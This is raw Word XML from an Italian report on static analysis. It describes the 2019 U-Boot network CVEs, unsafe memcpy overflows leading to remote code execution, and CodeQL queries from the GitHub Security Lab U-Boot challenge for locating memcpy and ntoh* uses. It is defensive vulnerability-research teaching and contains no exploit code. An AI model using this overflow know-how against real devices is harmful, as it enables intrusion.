          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B10907E" wp14:editId="1FF8664C">
            <wp:extent cx="4894217" cy="4114641"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="348419762" name="Immagine 5" descr="Immagine che contiene testo, line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19762" name="Immagine 5" descr="Immagine che contiene testo, linea, software, Pagina Web&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId92"/>
                    <a:srcRect r="54727"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4956317" cy="416684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37733FB" wp14:editId="6126A747">
            <wp:extent cx="5320937" cy="4041958"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="793094450" name="Immagine 6"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4450" name="Immagine 6" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId93"/>
                    <a:srcRect r="28585" b="45875"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5339333" cy="40559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8ECB9" wp14:editId="79E69CAF">
            <wp:extent cx="5251269" cy="4600028"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="778072380" name="Immagine 7"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2380" name="Immagine 7" descr="Immagine che contiene testo, software, Pagina Web, schermata&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId94"/>
                    <a:srcRect r="33434" b="19413"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5268733" cy="4615326"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="307BF0C8" w14:textId="2EB79CDD" w:rsidR="00CE1BC3" w:rsidRDefault="00B04C44" w:rsidP="001378E1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22435B0D" w14:textId="77777777" w:rsidR="006417B5" w:rsidRDefault="00B23734" w:rsidP="00CE1BC3">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:spacing w:before="600"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc140165790"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00CE1BC3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Static Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="5EFDBEE0" w14:textId="3D1FCBAC" w:rsidR="00C3397C" w:rsidRDefault="00C3397C" w:rsidP="00C3397C">
      <w:r>
        <w:t>L'obiettivo principale della static analysis è identificare potenziali problemi o errori nel codice prima che venga eseguito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F844C6B" w14:textId="77777777" w:rsidR="00C3397C" w:rsidRDefault="00C3397C" w:rsidP="00C3397C">
      <w:r>
        <w:t>Durante la static analysis, uno strumento automatizzato analizza il codice sorgente alla ricerca di violazioni delle regole di programmazione, errori di sintassi, potenziali vulnerabilità di sicurezza e altri problemi di qualità del codice. Questo processo è basato sull'analisi delle caratteristiche strutturali e semantiche del codice, senza richiedere l'esecuzione del programma.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A55A3C4" w14:textId="77777777" w:rsidR="00ED33B8" w:rsidRDefault="00ED33B8" w:rsidP="00ED33B8">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc140165791"/>
      <w:r>
        <w:t>4.1 U-Boot</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="04E54556" w14:textId="77777777" w:rsidR="00A84298" w:rsidRDefault="004D399F" w:rsidP="00ED33B8">
      <w:r w:rsidRPr="004D399F">
        <w:t>U-Boot, acronimo di "Universal Bootloader", è un firmware open source ampiamente utilizzato come bootloader e sistema di avvio per dispositivi embedded come computer a scheda singola, router, dispositivi di archiviazione di rete e altri dispositivi incorporati.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6746117C" w14:textId="79806B3D" w:rsidR="008450D3" w:rsidRDefault="008450D3" w:rsidP="008450D3">
      <w:r>
        <w:t>Le vulnerabilità possono essere attivate quando U-Boot è configurato per utilizzare la rete per recuperare le risorse di avvio della fase successiva. MITRE ha emesso i seguenti CVE per le 13 vulnerabilità: CVE-2019-14192 , CVE-2019-14193 , CVE-2019-14194 , CVE - 2019-14195 , CVE-2019-14196 , CVE-2019-14197 , CVE-2019 -14198 , CVE-2019-14199 , CVE-2019-14200 , CVE-2019-14201 , CVE-2019-14202 , CVE-2019-14203 e CVE-2019-14204 .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABBE3A2" w14:textId="77777777" w:rsidR="008450D3" w:rsidRDefault="008450D3" w:rsidP="008450D3">
      <w:r>
        <w:t xml:space="preserve">Attraverso queste vulnerabilità un utente malintenzionato nella stessa rete (o controllando un server NFS dannoso) potrebbe ottenere l'esecuzione di codice sul dispositivo alimentato da U-Boot. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7855DB" w14:textId="07181B66" w:rsidR="00FC1C4C" w:rsidRDefault="00FC1C4C" w:rsidP="008450D3">
      <w:r w:rsidRPr="00FC1C4C">
        <w:t>Le prime due occorrenze della vulnerabilità erano semplici overflow di memcpy con una dimensione controllata dall'attaccante proveniente dal pacchetto di rete senza alcuna convalida.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38272381" w14:textId="54C2EFEA" w:rsidR="00FC1C4C" w:rsidRDefault="00FC1C4C" w:rsidP="00FC1C4C">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc140165792"/>
      <w:r>
        <w:t>4.2 memcpy()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="19DB9866" w14:textId="3E3D8C5E" w:rsidR="00590065" w:rsidRDefault="00590065" w:rsidP="00590065">
      <w:r>
        <w:t xml:space="preserve">La funzione memcpy è una funzione di libreria standard nel linguaggio di programmazione C e viene utilizzata per copiare un blocco di memoria da una posizione all'altra. La sua firma è solitamente la seguente: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD321B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>void *memcpy(void *dest, const void *src, size_t n)</w:t>
      </w:r>
      <w:r>
        <w:t>. Prende tre argomenti: il puntatore alla destinazione (dest), il puntatore all'origine (src) e il numero di byte da copiare (n).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187250EE" w14:textId="2293B18A" w:rsidR="00590065" w:rsidRDefault="00590065" w:rsidP="00590065">
      <w:r>
        <w:t xml:space="preserve">La funzione memcpy copia i dati dalla posizione di memoria di origine (src) alla posizione di memoria di destinazione (dest) per un numero specificato di byte (n). </w:t>
      </w:r>
      <w:r w:rsidR="00DD321B">
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>emcpy non effettua controlli sulla dimensione dei buffer o sulla sovrapposizione delle aree di memoria coinvolte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74978610" w14:textId="10305FBA" w:rsidR="00590065" w:rsidRDefault="00145326" w:rsidP="00590065">
      <w:r w:rsidRPr="00145326">
        <w:t xml:space="preserve">Un attaccante malintenzionato potrebbe sfruttare un buffer overflow utilizzando memcpy in modo non sicuro. Ad esempio, potrebbe creare dati di input malevoli più lunghi della </w:t>
      </w:r>
      <w:r w:rsidRPr="00145326">
        <w:lastRenderedPageBreak/>
        <w:t>dimensione consentita del buffer di destinazione. In questo modo, è possibile sovrascrivere la memoria circostante e inserire del codice arbitrario che verrà eseguito dal programma compromesso, consentendo all'attaccante di ottenere il controllo remoto del sistema (Remote Code Execution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1AB240" w14:textId="3CF54004" w:rsidR="00803140" w:rsidRDefault="00803140" w:rsidP="00590065">
      <w:r w:rsidRPr="00803140">
        <w:t>U-Boot contiene centinaia di chiamate memcpy</w:t>
      </w:r>
      <w:r w:rsidR="001F68DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00803140">
        <w:t>e libc</w:t>
      </w:r>
      <w:r w:rsidR="001F68DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00803140">
        <w:t>funzioni che leggono dalla rete come ntohle ntohs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58306B5C" w14:textId="0C0873CF" w:rsidR="00145326" w:rsidRDefault="002C3603" w:rsidP="002C3603">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc140165793"/>
      <w:r>
        <w:t>4.3 CodeQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="276154C9" w14:textId="00CA29A3" w:rsidR="008E364F" w:rsidRDefault="008E364F" w:rsidP="008E364F">
      <w:r>
        <w:t>CodeQL è una potente tecnologia di analisi statica del codice sviluppata da Semmle, un'azienda di proprietà di GitHub (Microsoft). è progettato per eseguire analisi sofisticate e approfondite del codice sorgente, consentendo agli sviluppatori di identificare vulnerabilità, bug e problematiche di sicurezza nel software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D33F3A7" w14:textId="5BAEECCC" w:rsidR="008E364F" w:rsidRDefault="008E364F" w:rsidP="008E364F">
      <w:r>
        <w:t>CodeQL utilizza una combinazione di linguaggi di programmazione, query e database per analizzare il codice. Utilizza un linguaggio di query flessibile e potente chiamato QL (Query Language) per definire pattern e regole che possono essere applicate al codice sorgente. Le query QL permettono di individuare specifiche problematiche nel codice, come potenziali vulnerabilità, errori di programmazione, problemi di prestazioni e altro ancora.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4156E6A3" w14:textId="77777777" w:rsidR="008E364F" w:rsidRDefault="008E364F" w:rsidP="008E364F">
      <w:r>
        <w:t>CodeQL si basa su un modello di database del codice sorgente che viene costruito durante il processo di analisi. Questo modello permette di rappresentare le relazioni tra diverse parti del codice e di effettuare analisi precise e complesse. Gli sviluppatori possono scrivere query personalizzate per interrogare il database del codice sorgente e ottenere informazioni dettagliate sulle problematiche individuate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32680F52" w14:textId="2A79098F" w:rsidR="002B15D4" w:rsidRDefault="002B15D4" w:rsidP="008E364F">
      <w:r>
        <w:t>Andiamo quindi a vedere come sono strutturate le query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7C1A1C" w14:textId="77777777" w:rsidR="002B15D4" w:rsidRPr="002B15D4" w:rsidRDefault="002B15D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861612"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B15D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="002B15D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DCC6E0"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="002B15D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B15D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D0AB"/>
        </w:rPr>
        <w:t>/* ... path to some CodeQL libraries ... */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66027970" w14:textId="77777777" w:rsidR="002B15D4" w:rsidRPr="002B15D4" w:rsidRDefault="002B15D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861612"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B15D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>2.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F9B2A8" w14:textId="77777777" w:rsidR="002B15D4" w:rsidRPr="002B15D4" w:rsidRDefault="002B15D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861612"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B15D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="002B15D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DCC6E0"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidRPr="002B15D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B15D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D0AB"/>
        </w:rPr>
        <w:t>/* ... variable declarations ... */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114778E7" w14:textId="77777777" w:rsidR="002B15D4" w:rsidRPr="002B15D4" w:rsidRDefault="002B15D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861612"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B15D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="002B15D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DCC6E0"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r w:rsidRPr="002B15D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B15D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D0AB"/>
        </w:rPr>
        <w:t>/* ... logical formulas that say something about the variables ... */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FA5DC7" w14:textId="0C91876B" w:rsidR="00A66AE8" w:rsidRPr="00A66AE8" w:rsidRDefault="002B15D4" w:rsidP="00A66AE8">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861612"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B15D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="002B15D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DCC6E0"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidRPr="002B15D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B15D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D0AB"/>
        </w:rPr>
        <w:t>/* ... expressions to output ... */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0403E3D1" w14:textId="23371650" w:rsidR="00E33CA3" w:rsidRDefault="008E364F" w:rsidP="008E364F">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc140165794"/>
      <w:r>
        <w:t>4.4 U</w:t>
      </w:r>
      <w:r w:rsidR="00E33CA3">
        <w:t>-boot Challenge</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="7A1869D2" w14:textId="77777777" w:rsidR="00BE231D" w:rsidRDefault="00BE231D" w:rsidP="00E33CA3">
      <w:r w:rsidRPr="00BE231D">
        <w:t>L'obiettivo è trovare una serie di 9 vulnerabilità di esecuzione di codice in modalità remota nel boot loader di U-Boot. Queste vulnerabilità sono state originariamente scoperte dai ricercatori del GitHub Security Lab e da allora sono state corrette.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B6742D" w14:textId="77777777" w:rsidR="003E26F9" w:rsidRDefault="00BE231D" w:rsidP="00BE231D">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc140165795"/>
      <w:r>
        <w:t>4.4.1</w:t>
      </w:r>
      <w:r w:rsidR="0092554C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D36336">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="0092554C" w:rsidRPr="0092554C">
        <w:t xml:space="preserve">rovare tutte le funzioni </w:t>
      </w:r>
      <w:r w:rsidR="00D36336">
        <w:t xml:space="preserve">chiamate </w:t>
      </w:r>
      <w:r w:rsidR="0092554C" w:rsidRPr="0092554C">
        <w:t>memcpy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="1DC3E24F" w14:textId="44D68680" w:rsidR="003E26F9" w:rsidRDefault="0007111F" w:rsidP="009E118A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Enfasiintensa"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creiamo la query nel file </w:t>
      </w:r>
      <w:hyperlink r:id="rId95" w:history="1">
        <w:r w:rsidR="009E118A" w:rsidRPr="009E118A">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>3_function_definitions.ql</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009E118A">
        <w:rPr>
          <w:rStyle w:val="Enfasiintensa"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF81EE8" w14:textId="72D10573" w:rsidR="00083ABB" w:rsidRDefault="00083ABB" w:rsidP="00083ABB">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>importa il modulo "cpp" che contiene le definizioni specifiche per il linguaggio di programmazione C++.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C666E6" w14:textId="77777777" w:rsidR="00083ABB" w:rsidRDefault="00083ABB" w:rsidP="00083ABB">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Definisce una variabile f che rappresenta una funzione nel codice sorgente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E665D5E" w14:textId="77777777" w:rsidR="00083ABB" w:rsidRDefault="00083ABB" w:rsidP="00083ABB">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Utilizza il predicato where per filtrare solo le funzioni con il nome "strlen".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ACAF59" w14:textId="77777777" w:rsidR="00083ABB" w:rsidRDefault="00083ABB" w:rsidP="001E0A30">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Utilizza il predicato select per selezionare sia la variabile f (la funzione) che una stringa che descrive la funzione come "a function named strlen"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1FFC66" w14:textId="77777777" w:rsidR="00A61A14" w:rsidRDefault="003E26F9" w:rsidP="009A12AE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59F5E778" wp14:editId="5D045BDC">
            <wp:extent cx="6450632" cy="1410788"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="531101302" name="Immagine 1" descr="Immagine che contiene software, testo, Software multimediale, Software per la grafica&#10;&#10;Descrizione generata automaticament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02" name="Immagine 1" descr="Immagine che contiene software, testo, Software multimediale, Software per la grafica&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId96"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId97"/>
                    <a:srcRect l="21490" t="6260" b="56456"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6512827" cy="1424390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6092A05C" w14:textId="3C05B545" w:rsidR="002C556E" w:rsidRDefault="002C556E" w:rsidP="002C556E">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc140165796"/>
      <w:r>
        <w:t>4.4.</w:t>
      </w:r>
      <w:r w:rsidR="00C43B24">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007329AE">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="002A7D94" w:rsidRPr="002A7D94">
        <w:t>rovare tutte le funzioni nominatememcpy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="428367DE" w14:textId="790C3740" w:rsidR="00014319" w:rsidRDefault="00014319" w:rsidP="00014319">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Enfasiintensa"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creiamo la query nel file </w:t>
      </w:r>
      <w:hyperlink r:id="rId98" w:history="1">
        <w:r w:rsidRPr="001D7EF2">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>4_memcpy_definitions.ql</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E31E925" w14:textId="77777777" w:rsidR="001D7EF2" w:rsidRDefault="003E26F9" w:rsidP="009A12AE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C769097" wp14:editId="64B0972C">
            <wp:extent cx="6453992" cy="1158240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="872180110" name="Immagine 2" descr="Immagine che contiene schermata, software, Software multimediale, testo&#10;&#10;Descrizione generata automaticament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0110" name="Immagine 2" descr="Immagine che contiene schermata, software, Software multimediale, testo&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId99"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId100"/>
                    <a:srcRect l="18745" r="937" b="64260"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6514813" cy="1169155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="353B4F69" w14:textId="4A018835" w:rsidR="00CF0EDA" w:rsidRDefault="00CF0EDA" w:rsidP="00CF0EDA">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc140165797"/>
      <w:r>
        <w:t xml:space="preserve">4.4.3 </w:t>
      </w:r>
      <w:r w:rsidR="003A5455">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00422243" w:rsidRPr="00422243">
        <w:t>rova</w:t>
      </w:r>
      <w:r w:rsidR="007329AE">
        <w:t>re</w:t>
      </w:r>
      <w:r w:rsidR="00422243" w:rsidRPr="00422243">
        <w:t xml:space="preserve"> tutte ntoh*le macro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="16CD704D" w14:textId="7301C606" w:rsidR="001A5796" w:rsidRDefault="00F808C5" w:rsidP="001A5796">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Enfasiintensa"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creiamo la query nel file </w:t>
      </w:r>
      <w:hyperlink r:id="rId101" w:history="1">
        <w:r w:rsidR="00A973A1" w:rsidRPr="00A973A1">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>5_macro_definitions.ql</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003E26F9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22104CF5" wp14:editId="2314EAA7">
            <wp:extent cx="6645910" cy="1852930"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="528852788" name="Immagine 3" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticament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2788" name="Immagine 3" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
